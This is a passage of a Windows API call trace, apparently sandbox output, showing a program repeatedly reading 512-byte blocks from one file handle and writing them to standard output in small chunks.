lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.313] GetFileType (hFile=0x50) returned 0x1 [0151.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.313] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.313] GetFileType (hFile=0x50) returned 0x1 [0151.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.313] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.313] GetFileType (hFile=0x50) returned 0x1 [0151.313] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.313] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.314] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.314] GetFileType (hFile=0x50) returned 0x1 [0151.314] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.314] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.314] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.314] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.314] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0151.314] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.314] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.314] GetFileType (hFile=0x50) returned 0x1 [0151.314] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.314] GetFileType (hFile=0x50) returned 0x1 [0151.314] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.314] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.314] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.314] GetFileType (hFile=0x50) returned 0x1 [0151.314] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.314] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.314] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.314] GetFileType (hFile=0x50) returned 0x1 [0151.314] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.314] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.315] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.315] GetFileType (hFile=0x50) returned 0x1 [0151.315] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.315] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.315] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.315] 
GetFileType (hFile=0x50) returned 0x1 [0151.315] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.315] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.315] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.315] GetFileType (hFile=0x50) returned 0x1 [0151.315] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.315] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.315] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.315] GetFileType (hFile=0x50) returned 0x1 [0151.315] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.315] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.315] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.315] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.315] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.315] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.315] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.315] GetFileType (hFile=0x50) returned 0x1 [0151.316] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.316] GetFileType (hFile=0x50) returned 0x1 [0151.316] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.316] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | 
out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.316] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.316] GetFileType (hFile=0x50) returned 0x1 [0151.316] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.316] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.316] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.316] GetFileType (hFile=0x50) returned 0x1 [0151.316] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.316] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.316] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.316] GetFileType (hFile=0x50) returned 0x1 [0151.316] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.316] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.316] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.316] GetFileType (hFile=0x50) returned 0x1 [0151.316] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.316] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.316] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.316] GetFileType (hFile=0x50) returned 0x1 [0151.316] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.316] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, 
lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.317] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.317] GetFileType (hFile=0x50) returned 0x1 [0151.317] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.317] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.317] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.317] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.317] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.317] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.317] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.317] GetFileType (hFile=0x50) returned 0x1 [0151.317] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.317] GetFileType (hFile=0x50) returned 0x1 [0151.317] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.317] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.317] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.317] GetFileType (hFile=0x50) returned 0x1 [0151.317] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.317] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.317] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.317] GetFileType (hFile=0x50) returned 0x1 [0151.317] _get_osfhandle (_FileHandle=1) returned 0x50 
[0151.317] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.318] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.318] GetFileType (hFile=0x50) returned 0x1 [0151.318] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.318] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.318] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.318] GetFileType (hFile=0x50) returned 0x1 [0151.318] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.318] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.318] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.318] GetFileType (hFile=0x50) returned 0x1 [0151.318] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.318] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.318] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.318] GetFileType (hFile=0x50) returned 0x1 [0151.318] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.318] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.318] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.318] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) 
returned 1 [0151.318] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.318] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.318] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.318] GetFileType (hFile=0x50) returned 0x1 [0151.318] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.318] GetFileType (hFile=0x50) returned 0x1 [0151.319] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.319] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.319] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.319] GetFileType (hFile=0x50) returned 0x1 [0151.319] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.319] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.319] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.319] GetFileType (hFile=0x50) returned 0x1 [0151.319] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.319] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.319] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.319] GetFileType (hFile=0x50) returned 0x1 [0151.319] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.319] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.319] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0151.319] GetFileType (hFile=0x50) returned 0x1 [0151.319] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.319] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.319] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.319] GetFileType (hFile=0x50) returned 0x1 [0151.319] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.319] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.319] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.319] GetFileType (hFile=0x50) returned 0x1 [0151.320] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.320] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.320] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.320] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.320] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.320] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.320] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.320] GetFileType (hFile=0x50) returned 0x1 [0151.320] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.320] GetFileType (hFile=0x50) returned 0x1 [0151.320] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.320] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.320] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.320] GetFileType (hFile=0x50) returned 0x1 [0151.320] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.320] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.320] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.320] GetFileType (hFile=0x50) returned 0x1 [0151.320] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.320] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.320] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.320] GetFileType (hFile=0x50) returned 0x1 [0151.320] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.320] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.321] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.321] GetFileType (hFile=0x50) returned 0x1 [0151.321] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.321] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.321] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.321] GetFileType (hFile=0x50) returned 0x1 [0151.321] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.321] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, 
lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.321] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.321] GetFileType (hFile=0x50) returned 0x1 [0151.321] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.321] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.321] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.321] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.321] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.321] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.321] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.321] GetFileType (hFile=0x50) returned 0x1 [0151.321] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.321] GetFileType (hFile=0x50) returned 0x1 [0151.321] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.321] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.322] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.322] GetFileType (hFile=0x50) returned 0x1 [0151.322] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.322] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.322] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.322] GetFileType (hFile=0x50) returned 0x1 [0151.322] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0151.322] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.322] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.322] GetFileType (hFile=0x50) returned 0x1 [0151.322] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.322] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.322] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.322] GetFileType (hFile=0x50) returned 0x1 [0151.322] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.322] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.322] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.322] GetFileType (hFile=0x50) returned 0x1 [0151.322] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.322] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.322] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.322] GetFileType (hFile=0x50) returned 0x1 [0151.323] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.323] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.323] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.323] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.323] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.323] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.323] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.323] GetFileType (hFile=0x50) returned 0x1 [0151.323] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.323] GetFileType (hFile=0x50) returned 0x1 [0151.323] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.323] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.323] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.323] GetFileType (hFile=0x50) returned 0x1 [0151.323] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.323] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.323] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.323] GetFileType (hFile=0x50) returned 0x1 [0151.323] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.323] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.323] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.323] GetFileType (hFile=0x50) returned 0x1 [0151.323] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.324] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, 
lpOverlapped=0x0) returned 1 [0151.324] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.324] GetFileType (hFile=0x50) returned 0x1 [0151.324] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.324] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.324] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.324] GetFileType (hFile=0x50) returned 0x1 [0151.324] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.324] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.324] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.324] GetFileType (hFile=0x50) returned 0x1 [0151.324] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.324] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, 